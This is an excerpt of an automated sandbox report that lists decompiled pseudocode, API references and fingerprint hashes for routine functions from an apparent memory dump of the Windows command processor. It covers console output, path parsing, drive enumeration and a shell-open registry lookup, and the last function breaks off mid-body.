Part of subcall function 001C269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000002), ref: 001C26E1
Part of subcall function 001C269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001C26EC
Part of subcall function 001C269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26F5

_get_osfhandle.MSVCRT ref: 001C987D
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001C64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C9885
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,001C65F0,?,001C64F0), ref: 001C98C4
_get_osfhandle.MSVCRT ref: 001C98DD
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001C64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C98E5

Part of subcall function 001C27C8: _get_osfhandle.MSVCRT ref: 001C27DB
Part of subcall function 001C27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001EB980,000000FF,001DD620,00002000,00000000,00000000), ref: 001C281C
Part of subcall function 001C27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001DD620,-00000001,?,00000000), ref: 001C2831

longjmp.MSVCRT(001EB8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C9968

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
String ID:
API String ID: 1333215474-0
Opcode ID: 1d7a378651751bb635d2c146c865c5dc935364711f19c68141ac0e9e78f894bc
Instruction ID: 92b17fcc3e9032679c2ad90b06b1c9087a603148ae12eface3b4bf1ce3b114aa
Opcode Fuzzy Hash: 1d7a378651751bb635d2c146c865c5dc935364711f19c68141ac0e9e78f894bc
Instruction Fuzzy Hash: 88519571B00305ABDB24AB75D88AFBEB3A8EB24705F11452EE946D7681EB71DD40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BC923 Relevance: 10.8, APIs: 7, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001BC923(signed short** __ecx) {
				signed short* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed short _t33;
				signed int _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed int _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				WCHAR* _t42;
				WCHAR* _t47;
				signed int _t48;
				signed int _t49;
				void* _t54;
				long _t56;
				int _t62;
				signed short _t64;
				signed int _t69;
				signed int _t70;
				signed short* _t72;
				signed short* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				signed int _t79;
				signed char _t80;
				signed short* _t82;
				WCHAR* _t84;
				WCHAR* _t90;
				signed int _t95;
				signed short* _t107;
				signed int _t108;
				short* _t109;
				short* _t111;
				WCHAR* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				WCHAR** _t121;
				signed short* _t122;
				signed int _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				int _t130;
				signed int _t131;
				WCHAR* _t132;

				_t121 = __ecx;
				_v12 = 0x1b1f8c;
				 *0x1f3cf0 = 0;
				_t82 =  *__ecx;
				_t122 = _t82;
				_t2 =  &(_t122[1]); // 0x2
				_t107 = _t2;
				do {
					_t33 =  *_t122;
					_t122 =  &(_t122[1]);
				} while (_t33 != 0);
				_t34 =  *_t82 & 0x0000ffff;
				_t124 = _t122 - _t107 >> 1;
				_t74 = _t82;
				_v20 = _t124;
				_t108 = _t34;
				if(_t34 == 0) {
					L6:
					_t35 = 0x3a;
					_v8 = _t74;
					_v24 = _t35;
					if(_t108 == _t35) {
						__eflags = _t124 - 2;
						if(_t124 <= 2) {
							goto L7;
						}
						 *_t74 = 0;
						_t24 = _t74 - 2; // -2
						_v8 = _t24;
						_t62 = SetErrorMode(0);
						_t102 =  *_t121;
						_v16 = _t62;
						_t132 = E001BD120( *_t121, 0x8000, _t82);
						__eflags = _t132 - 0xffffffff;
						if(_t132 == 0xffffffff) {
							L49:
							__eflags =  *0x1dd0dc - 4;
							_t64 = 0x3a;
							_v8 = _t74;
							 *_t74 = _t64;
							if( *0x1dd0dc != 4) {
								E001BC5A2(_t102, 0x236b, 1,  *_t121);
							} else {
								__eflags =  *0x1dd5a8;
								if( *0x1dd5a8 == 0) {
									E001BC5A2(_t102, 0x236b, 1,  *_t121);
								}
								 *0x1dd5a4 = 1;
							}
							__eflags = _t132 - 0xffffffff;
							L55:
							if(__eflags == 0) {
								L57:
								SetErrorMode(_v16);
								goto L7;
							}
							L56:
							E001BDB92(_t132);
							goto L57;
						}
						_t69 = E001C0178(_t63);
						__eflags = _t69;
						if(_t69 != 0) {
							L47:
							_t70 = E001C0178(_t69);
							__eflags = _t70;
							if(_t70 != 0) {
								goto L56;
							}
							__eflags = E001D9953(_t70, _t132);
							goto L55;
						}
						_t102 = _t132;
						_t69 = E001D9953(_t69, _t132);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L49;
						}
						goto L47;
					}
					L7:
					_t83 = 0x250;
					_t36 = E001C00B0(0x250);
					if(_t36 == 0) {
						L58:
						E001D9287(_t83);
						__imp__longjmp(0x1eb8b8, 1);
						L59:
						_t125 =  *_t121;
						_t75 = 0;
						__eflags = 0;
						_t84 = _t125;
						_t29 =  &(_t84[1]); // 0x0
						_t109 = _t29;
						do {
							_t38 =  *_t84;
							_t84 =  &(_t84[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						__eflags = _t84 - _t109 >> 1 - 2;
						if(_t84 - _t109 >> 1 >= 2) {
							_t38 = 0x3a;
							__eflags = _t125[1] - _t38;
							if(_t125[1] == _t38) {
								_t125 =  &(_t125[2]);
							}
						}
						L11:
						__imp___wcsicmp(_t125, ".");
						if(_t38 == 0) {
							L39:
							_t126 =  *_t121;
							_t39 = 0x5c;
							_t40 = E001C2349(_t126, _t39);
							__eflags = _t40;
							if(_t40 == 0) {
								_t90 = _t126;
								__eflags = 0;
								_t31 =  &(_t90[1]); // 0x0
								_t111 = _t31;
								do {
									_t41 =  *_t90;
									_t90 =  &(_t90[1]);
									__eflags = _t41;
								} while (_t41 != 0);
								__eflags = _t90 - _t111 >> 1 - 2;
								if(_t90 - _t111 >> 1 != 2) {
									goto L40;
								}
								_t54 = 0x3a;
								__eflags = _t126[1] - _t54;
								if(_t126[1] == _t54) {
									L42:
									 *(_t121[6]) = 0x10;
									L17:
									_t79 = 1;
									_t129 = 0;
									_t47 =  *_t121;
									_t114 = _t47;
									while(1) {
										_t95 =  *_t114 & 0x0000ffff;
										if(_t95 == 0) {
											break;
										}
										if(_t95 == _v16) {
											L23:
											_t129 = _t114;
											L21:
											_t114 =  &(_t114[1]);
											_t79 = _t79 + 1;
											continue;
										}
										if(_t95 == _v24) {
											__eflags = _t79 - 2;
											if(_t79 != 2) {
												goto L21;
											}
											goto L23;
										}
										goto L21;
									}
									_t121[3] = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t129 = _t47;
									} else {
										__eflags =  *_t129;
										if( *_t129 == 0) {
											_t47 = _t129;
										} else {
											_t12 =  &(_t129[1]); // 0x2
											_t47 = _t12;
										}
									}
									_t115 = 0x2a;
									_t121[4] = _t47;
									_t48 = E001BD7D4(_t129, _t115);
									__eflags = _t48;
									if(_t48 == 0) {
										_t116 = 0x3f;
										_t49 = E001BD7D4(_t129, _t116);
										__eflags = _t49;
										if(_t49 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										L28:
										_t14 =  &(_t121[7]);
										 *_t14 = _t121[7] | 0x00000008;
										__eflags =  *_t14;
										 *0x1f3cd0 = 1;
										L29:
										_t117 = 0x2e;
										_t121[5] = E001BD7D4(_t129, _t117);
										__eflags = 1;
										return 1;
									}
								}
							}
							L40:
							_t77 =  *_t121;
							_t83 = _v20 + 5 + _v20 + 5;
							_t42 = E001C00B0(_v20 + 5 + _v20 + 5);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L58;
							}
							 *_t121 = _t42;
							E001C1040(_t42, _t128, _t77);
							E001C18C0( *_t121, _t128, _v12);
							goto L42;
						}
						__imp___wcsicmp(_t125, L"..");
						if(_t38 == 0) {
							goto L39;
						}
						if( *0x1dd0dc == 4) {
							__eflags =  *0x1dd5ac - 1;
							if( *0x1dd5ac == 1) {
								goto L14;
							}
							__eflags =  *0x1dd0c0 - 1;
							if( *0x1dd0c0 != 1) {
								goto L17;
							}
							 *0x1dd0c0 = _t75;
						}
						L14:
						_t80 = GetFileAttributesW( *_t121);
						if(_t80 != 0xffffffff) {
							_t56 = 0;
						} else {
							_t56 = GetLastError();
						}
						 *0x1f3cf0 = _t56;
						if(_t80 != 0xffffffff) {
							__eflags = _t80 & 0x00000010;
							if((_t80 & 0x00000010) == 0) {
								goto L17;
							}
							goto L39;
						} else {
							goto L17;
						}
					}
					_t121[6] = _t36;
					_t130 = 0x5c;
					_v16 = _t130;
					if(( *_v8 & 0x0000ffff) == _t130) {
						_v12 = 0x1b1f8e;
						goto L39;
					}
					_t38 = E001C2349( *_t121, _t130);
					_t131 = _t38;
					if(_t131 == 0) {
						goto L59;
					}
					_t125 = _t131 + 2;
					_t75 = 0;
					goto L11;
				} else {
					goto L4;
					L4:
					_t72 = _t82;
					_t74 = _t82;
					_t82 =  &(_t82[1]);
					if( *_t82 != 0) {
						goto L4;
					} else {
						_t108 =  *_t72 & 0x0000ffff;
						goto L6;
					}
				}
			}

0x001bc92e
0x001bc930
0x001bc939
0x001bc93f
0x001bc941
0x001bc943
0x001bc943
0x001bc946
0x001bc946
0x001bc949
0x001bc94c
0x001bc951
0x001bc956
0x001bc958
0x001bc95a
0x001bc95d
0x001bc962
0x001bc975
0x001bc977
0x001bc978
0x001bc97b
0x001bc981
0x001caff7
0x001caffa
0x00000000
0x00000000
0x001cb002
0x001cb005
0x001cb008
0x001cb00e
0x001cb015
0x001cb01c
0x001cb024
0x001cb026
0x001cb029
0x001cb057
0x001cb057
0x001cb060
0x001cb061
0x001cb064
0x001cb067
0x001cb098
0x001cb069
0x001cb069
0x001cb070
0x001cb07b
0x001cb080
0x001cb083
0x001cb083
0x001cb0a0
0x001cb0a3
0x001cb0a3
0x001cb0ac
0x001cb0af
0x00000000
0x001cb0af
0x001cb0a5
0x001cb0a7
0x00000000
0x001cb0a7
0x001cb02d
0x001cb032
0x001cb034
0x001cb041
0x001cb043
0x001cb048
0x001cb04a
0x00000000
0x00000000
0x001cb053
0x00000000
0x001cb053
0x001cb036
0x001cb038
0x001cb03d
0x001cb03f
0x00000000
0x00000000
0x00000000
0x001cb03f
0x001bc987
0x001bc987
0x001bc98c
0x001bc993
0x001cb0ba
0x001cb0ba
0x001cb0c6
0x001cb0cc
0x001cb0cc
0x001cb0ce
0x001cb0ce
0x001cb0d0
0x001cb0d2
0x001cb0d2
0x001cb0d5
0x001cb0d5
0x001cb0d8
0x001cb0db
0x001cb0db
0x001cb0e4
0x001cb0e7
0x001cb0ef
0x001cb0f0
0x001cb0f4
0x001cb0fa
0x001cb0fa
0x001cb0f4
0x001bc9c9
0x001bc9cf
0x001bc9d9
0x001bcaf4
0x001bcaf4
0x001bcafa
0x001bcafd
0x001bcb02
0x001bcb04
0x001cb102
0x001cb104
0x001cb106
0x001cb106
0x001cb109
0x001cb109
0x001cb10c
0x001cb10f
0x001cb10f
0x001cb118
0x001cb11b
0x00000000
0x00000000
0x001cb123
0x001cb124
0x001cb128
0x001bcb3a
0x001bcb3d
0x001bca29
0x001bca2b
0x001bca2e
0x001bca30
0x001bca32
0x001bca34
0x001bca34
0x001bca3a
0x00000000
0x00000000
0x001bca40
0x001bca53
0x001bca53
0x001bca48
0x001bca48
0x001bca4b
0x00000000
0x001bca4b
0x001bca46
0x001bca4e
0x001bca51
0x00000000
0x00000000
0x00000000
0x001bca51
0x00000000
0x001bca46
0x001bca57
0x001bca5a
0x001bca5c
0x001cb13a
0x001bca62
0x001bca64
0x001bca67
0x001cb133
0x001bca6d
0x001bca6d
0x001bca6d
0x001bca6d
0x001bca67
0x001bca72
0x001bca75
0x001bca78
0x001bca7d
0x001bca7f
0x001bcaa8
0x001bcaab
0x001bcab0
0x001bcab2
0x00000000
0x00000000
0x00000000
0x001bca81
0x001bca81
0x001bca81
0x001bca81
0x001bca81
0x001bca85
0x001bca8f
0x001bca91
0x001bca99
0x001bcaa0
0x001bcaa5
0x001bcaa5
0x001bca7f
0x001cb12e
0x001bcb0a
0x001bcb0d
0x001bcb12
0x001bcb15
0x001bcb1a
0x001bcb1c
0x00000000
0x00000000
0x001bcb25
0x001bcb29
0x001bcb35
0x00000000
0x001bcb35
0x001bc9e5
0x001bc9ef
0x00000000
0x00000000
0x001bc9fc
0x001bcac8
0x001bcacf
0x00000000
0x00000000
0x001bcad5
0x001bcadc
0x00000000
0x00000000
0x001bcae2
0x001bcae2
0x001bca02
0x001bca0a
0x001bca0f
0x001bcab6
0x001bca15
0x001bca15
0x001bca15
0x001bca1b
0x001bca23
0x001bcabd
0x001bcac0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001bca23
0x001bc999
0x001bc9a1
0x001bc9a2
0x001bc9ab
0x001bcaed
0x00000000
0x001bcaed
0x001bc9b5
0x001bc9ba
0x001bc9be
0x00000000
0x00000000
0x001bc9c4
0x001bc9c7
0x00000000
0x001bc964
0x001bc964
0x001bc966
0x001bc966
0x001bc968
0x001bc96a
0x001bc970
0x00000000
0x001bc972
0x001bc972
0x00000000
0x001bc972
0x001bc970

APIs

_wcsicmp.MSVCRT ref: 001BC9CF
_wcsicmp.MSVCRT ref: 001BC9E5
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 001BCA04
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001BCA15

Part of subcall function 001BD7D4: wcschr.MSVCRT ref: 001BD7DA

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp$AttributesErrorFileLastwcschr
String ID:
API String ID: 2943530692-0
Opcode ID: 3730d4c2e1ce38acc7b2c2c4ae09ac0a6dfd55483ac2e58b8c1c17a811d1c07f
Instruction ID: a683b7b0c347dfeb5792261582a11469c9ebf3e35508ed10675bc4a9dd62c0a0
Opcode Fuzzy Hash: 3730d4c2e1ce38acc7b2c2c4ae09ac0a6dfd55483ac2e58b8c1c17a811d1c07f
Instruction Fuzzy Hash: 60911531B00215DBDB28EF789896BBBB3A1BB68714F15412EE816D7280FB708D81C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 001C5E50 Relevance: 10.8, APIs: 7, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001C5E50(void* __ecx) {
				intOrPtr _v8;
				long _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				short _v52;
				WCHAR* _v54;
				signed char _v56;
				signed int _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				long _v72;
				long _v80;
				WCHAR* _v88;
				signed char* _v92;
				short _v104;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t61;
				WCHAR* _t65;
				short _t66;
				void* _t67;
				void* _t68;
				void* _t74;
				short _t77;
				void* _t78;
				short _t82;
				wchar_t* _t85;
				signed char _t86;
				short _t89;
				short _t90;
				wchar_t* _t102;
				long _t103;
				short* _t104;
				short _t105;
				long _t106;
				short* _t109;
				signed int _t110;
				WCHAR* _t114;
				WCHAR* _t126;
				short _t132;
				long _t134;
				WCHAR* _t138;
				short* _t142;
				void* _t147;
				WCHAR* _t149;
				void* _t150;
				signed int _t155;
				signed int _t157;
				short _t163;

				_t110 = _t155;
				_push(__ecx);
				_push(__ecx);
				_t157 = (_t155 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t110 + 4));
				_t153 = _t157;
				_push(0xfffffffe);
				_push(0x1dbe38);
				_push(E001C7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t110);
				_t60 =  *0x1dd0b4; // 0xea614d48
				_v20 = _v20 ^ _t60;
				_t61 = _t60 ^ _t157;
				_v48 = _t61;
				_push(_t61);
				 *[fs:0x0] =  &_v28;
				_v36 = _t157 - 0x48;
				_t65 = E001BEA40( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)) + 0x3c)), 0, 0 |  *0x1f3cc9 != 0x00000000);
				_t149 = _t65;
				_v64 = _t149;
				_v68 = _t149;
				if( *0x1f3cc9 == 0) {
					L6:
					_t114 = _t149;
					_t15 =  &(_t114[1]); // 0x2
					_t142 = _t15;
					do {
						_t66 =  *_t114;
						_t114 =  &(_t114[1]);
					} while (_t66 != 0);
					_v60 = _t114 - _t142 >> 1;
					_t67 = E001C22C0(_t110, _t149);
					_t144 = _v60 + 1;
					_t118 = _t149;
					_t68 = E001C1040(_t149, _v60 + 1, _t67);
					 *0x1eb8b0 = 0;
					if( *_t149 == 0) {
						E001D83FD(_t68, _t118);
						L18:
						 *[fs:0x0] = _v28;
						_pop(_t147);
						_pop(_t150);
						return E001C6FD0( *0x1eb8b0, _t110, _v48 ^ _t153, _t144, _t147, _t150);
					}
					if(E001C5D59(_t110) == 0) {
						_push(0);
						_push(0x40002728);
						L47:
						E001BC5A2(_t118);
						 *0x1eb8b0 = 1;
						goto L18;
					}
					if( *0x1f3cc9 == 0) {
						L12:
						_t171 =  *0x1eb8b0;
						if( *0x1eb8b0 != 0) {
							L45:
							_t74 = E001C4B96(_t110, 0, _t149, __eflags);
							RtlFreeHeap(GetProcessHeap(), 0, _t74);
							_push(0);
							_push( *0x1eb8b0);
							goto L47;
						}
						_t144 = 0;
						_t118 = _t149;
						_t77 = E001C33FC(_t110, _t149, 0, 0, _t149, _t171);
						 *0x1eb8b0 = _t77;
						if(_t77 == 0) {
							_t78 = 0x3a;
							if(_t149[1] == _t78) {
								if( *0x1f3cb8 == 0) {
									_t118 = 0x1f3ab0;
								}
								_t144 =  *0x1f3cc0;
								E001C36CB(_t110, _t118,  *0x1f3cc0,  *_t149 & 0x0000ffff);
							}
						}
						if( *0x1eb8b0 != 0) {
							goto L45;
						}
						goto L18;
					}
					_t144 = 0x5c;
					if( *_t149 == _t144) {
						__eflags = _t149[1] - _t144;
						if(__eflags != 0) {
							goto L12;
						}
						_t126 = _t149;
						_t24 =  &(_t126[1]); // 0x2
						_v60 = _t24;
						do {
							_t82 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t82;
						} while (_t82 != 0);
						_v72 = (_t126 - _v60 >> 1) + 1;
						_t29 =  &(_t149[2]); // 0x4
						_t85 = wcschr(_t29, _t144);
						_v60 = _t85;
						__eflags = _t85;
						if(_t85 != 0) {
							_t134 = 0x5c;
							_t102 = wcschr( &(_t85[0]), _t134);
							_v60 = _t102;
							__eflags = _t102;
							if(_t102 != 0) {
								_t103 = GetFileAttributesW(_t149);
								__eflags = _t103 - 0xffffffff;
								if(_t103 != 0xffffffff) {
									_t104 = _v60;
									 *_t104 = 0;
									_t105 = _t104 + 2;
									__eflags = _t105;
									_v60 = _t105;
								} else {
									_t106 = GetLastError();
									 *0x1eb8b0 = _t106;
									__eflags = _t106 - 2;
									if(_t106 == 2) {
										 *0x1eb8b0 = 3;
									}
								}
							}
						}
						_t86 = 0x5a;
						_v56 = _t86;
						_t118 = 0x3a;
						_v54 = _t118;
						__eflags = 0;
						_v52 = 0;
						_v104 = 1;
						_v92 =  &_v56;
						_v88 = _t149;
						_v80 = 0;
						while(1) {
							__eflags =  *0x1eb8b0;
							if(__eflags != 0) {
								goto L45;
							}
							__eflags = _v56 - 0x41;
							if(__eflags == 0) {
								goto L12;
							}
							_v16 = 0;
							_t89 = E001C7797(_t118);
							__eflags = _t89;
							if(_t89 == 0) {
								 *0x1eb8b0 = 0x78;
							} else {
								 *0x1eb8b0 =  *0x1fc030( &_v108, 0, 0, 0);
							}
							_v16 = 0xfffffffe;
							_t90 =  *0x1eb8b0;
							__eflags = _t90;
							if(_t90 == 0) {
								_t144 = _v56;
								 *((short*)( *0x1f3ce8 +  *0x1f3ce4 * 8 - 4)) = _v56;
								 *_t149 = _v56;
								_t149[1] = _v54;
								_t132 = 0x5c;
								_t149[2] = _t132;
								_t118 =  &(_v68[3]);
								_t94 = _v60;
								__eflags = _v60;
								if(__eflags == 0) {
									 *_t118 = 0;
								} else {
									_t144 = _v72;
									E001C1040(_t118, _v72, _t94);
								}
								goto L12;
							} else {
								__eflags = _t90 - 0x55;
								if(_t90 == 0x55) {
									L41:
									_v56 = (_v56 & 0x000000ff) - 1;
									 *0x1eb8b0 = 0;
									continue;
								}
								__eflags = _t90 - 0x4b2;
								if(_t90 != 0x4b2) {
									continue;
								}
								goto L41;
							}
						}
						goto L45;
					}
					goto L12;
				} else {
					_t138 = _t149;
					_t163 =  *_t149;
					L3:
					_v60 = _t65;
					if(_t163 != 0) {
						_t65 = _t138;
						_t138 =  &(_t138[1]);
						__eflags =  *_t138;
						goto L3;
					}
					L4:
					while(_t65 > _t149 && iswspace( *_t65 & 0x0000ffff) != 0) {
						_t109 = _v60;
						 *_t109 = 0;
						_t65 = _t109 - 2;
						_v60 = _t65;
					}
					goto L6;
				}
			}

0x001c5e53
0x001c5e55
0x001c5e56
0x001c5e5a
0x001c5e61
0x001c5e65
0x001c5e67
0x001c5e69
0x001c5e6e
0x001c5e79
0x001c5e7a
0x001c5e7b
0x001c5e7c
0x001c5e80
0x001c5e85
0x001c5e88
0x001c5e8a
0x001c5e8f
0x001c5e93
0x001c5e99
0x001c5eb0
0x001c5eb5
0x001c5eb7
0x001c5eba
0x001c5ec6
0x001c5ef3
0x001c5ef3
0x001c5ef5
0x001c5ef5
0x001c5ef8
0x001c5ef8
0x001c5efb
0x001c5efe
0x001c5f07
0x001c5f0c
0x001c5f15
0x001c5f16
0x001c5f18
0x001c5f1d
0x001c5f26
0x001cf393
0x001c5f9c
0x001c5fa4
0x001c5fac
0x001c5fad
0x001c5fbe
0x001c5fbe
0x001c5f33
0x001cf55a
0x001cf55b
0x001cf560
0x001cf560
0x001cf566
0x00000000
0x001cf570
0x001c5f40
0x001c5f4e
0x001c5f4e
0x001c5f55
0x001cf53d
0x001cf53d
0x001cf54b
0x001cf551
0x001cf552
0x00000000
0x001cf552
0x001c5f5b
0x001c5f5d
0x001c5f5f
0x001c5f64
0x001c5f6b
0x001c5f6f
0x001c5f74
0x001c5f7e
0x001c5fc1
0x001c5fc1
0x001c5f84
0x001c5f8a
0x001c5f8a
0x001c5f74
0x001c5f96
0x00000000
0x00000000
0x00000000
0x001c5f96
0x001c5f44
0x001c5f48
0x001cf39d
0x001cf3a1
0x00000000
0x00000000
0x001cf3a7
0x001cf3a9
0x001cf3ac
0x001cf3af
0x001cf3af
0x001cf3b2
0x001cf3b5
0x001cf3b5
0x001cf3c2
0x001cf3c6
0x001cf3ca
0x001cf3d2
0x001cf3d5
0x001cf3d7
0x001cf3db
0x001cf3e1
0x001cf3e9
0x001cf3ec
0x001cf3ee
0x001cf3f1
0x001cf3f7
0x001cf3fa
0x001cf41a
0x001cf41d
0x001cf420
0x001cf420
0x001cf423
0x001cf3fc
0x001cf3fc
0x001cf402
0x001cf407
0x001cf40a
0x001cf40c
0x001cf40c
0x001cf40a
0x001cf3fa
0x001cf3ee
0x001cf428
0x001cf429
0x001cf42f
0x001cf430
0x001cf434
0x001cf436
0x001cf43a
0x001cf444
0x001cf447
0x001cf44a
0x001cf44d
0x001cf44d
0x001cf454
0x00000000
0x00000000
0x001cf45a
0x001cf45f
0x00000000
0x00000000
0x001cf465
0x001cf468
0x001cf46d
0x001cf46f
0x001cf485
0x001cf471
0x001cf47e
0x001cf47e
0x001cf48f
0x001cf4c0
0x001cf4c5
0x001cf4c7
0x001cf4ee
0x001cf4fd
0x001cf506
0x001cf50d
0x001cf513
0x001cf514
0x001cf51b
0x001cf51e
0x001cf521
0x001cf523
0x001cf535
0x001cf525
0x001cf526
0x001cf529
0x001cf529
0x00000000
0x001cf4c9
0x001cf4c9
0x001cf4cc
0x001cf4d9
0x001cf4df
0x001cf4e3
0x00000000
0x001cf4e3
0x001cf4ce
0x001cf4d3
0x00000000
0x00000000
0x00000000
0x001cf4d3
0x001cf4c7
0x00000000
0x001cf44d
0x00000000
0x001c5ec8
0x001c5ec8
0x001c5eca
0x001c5ed7
0x001c5ed7
0x001c5eda
0x001c5ecf
0x001c5ed1
0x001c5ed4
0x00000000
0x001c5ed4
0x00000000
0x001c5edc
0x001cf382
0x001cf385
0x001cf388
0x001cf38b
0x001cf38b
0x00000000
0x001c5edc

APIs

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

iswspace.MSVCRT ref: 001C5EE4

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$iswspace
String ID:
API String ID: 3458554142-0
Opcode ID: 272bb401b9cf890f22964a7f425b9a2aa4d2054f0e3d2878a5073c1e4c7bb880
Instruction ID: c226072c45237f25108deab7b6f0be58575cb8cf99842f597f0805d5628d648f
Opcode Fuzzy Hash: 272bb401b9cf890f22964a7f425b9a2aa4d2054f0e3d2878a5073c1e4c7bb880
Instruction Fuzzy Hash: 2B91C074904645DBDB28DFA8EC85FAEB7B6FB68300F10812EE406D7690EB30D981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001D4CF0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E001D4CF0(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t38;
				int _t42;
				signed int _t44;
				signed int _t45;
				signed int _t56;
				long _t64;
				intOrPtr _t67;
				short* _t69;
				signed int _t72;
				void* _t76;
				short* _t80;
				void* _t81;
				void* _t83;
				signed int _t90;
				signed int _t92;
				void* _t98;
				signed int _t99;
				void* _t102;
				signed int _t105;
				signed int _t108;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				int _t120;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t113 = __edx;
				_t38 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t38 ^ _t126;
				_t81 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					__eflags =  *__edx - 0x2e;
					if( *__edx != 0x2e) {
						_t119 = E001BDF40(E001BDEF9(__edx));
						__eflags = _t119;
						if(_t119 == 0) {
							L34:
							_t42 = 1;
							L55:
							return E001C6FD0(_t42, _t81, _v8 ^ _t126, _t113, _t119, _t120);
						}
						_t44 = E001C2349(_t119, 0x20);
						__eflags = _t44;
						if(_t44 != 0) {
							__eflags = 0;
							 *_t44 = 0;
						}
						_t90 = _t119;
						_t29 = _t90 + 2; // 0x2
						_t113 = _t29;
						do {
							_t45 =  *_t90;
							_t90 = _t90 + 2;
							__eflags = _t45;
						} while (_t45 != 0);
						_t92 = _t90 - _t113 >> 1;
						_push(_t119);
						_t30 = _t92 + 0x14; // 0x12
						__eflags = _t30 - 0x104;
						if(_t30 <= 0x104) {
							E001C1040( &_v528, 0x104);
							_t113 = 0x104;
							E001C18C0( &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t120 = RegOpenKeyExW(_t81,  &_v528, 0, 0x2000000,  &_v548);
							__eflags = _t120;
							if(__eflags == 0) {
								_t113 =  &_v528;
								_t95 = _t81;
								_t81 = E001D5662(_t81, _t81,  &_v528, _t119, _t120, __eflags);
								__eflags = _t81;
								if(_t81 == 0) {
									L51:
									E001BC5A2(_t95, 0x400023a5, 1, _t119);
									L52:
									E001C0040(_t81);
									L53:
									E001C0040(_t119);
									L54:
									_t42 = _t120;
									goto L55;
								}
								_t98 = _t81;
								_t36 = _t98 + 2; // 0x2
								_t113 = _t36;
								do {
									_t56 =  *_t98;
									_t98 = _t98 + 2;
									__eflags = _t56;
								} while (_t56 != 0);
								_t99 = _t98 - _t113;
								__eflags = _t99;
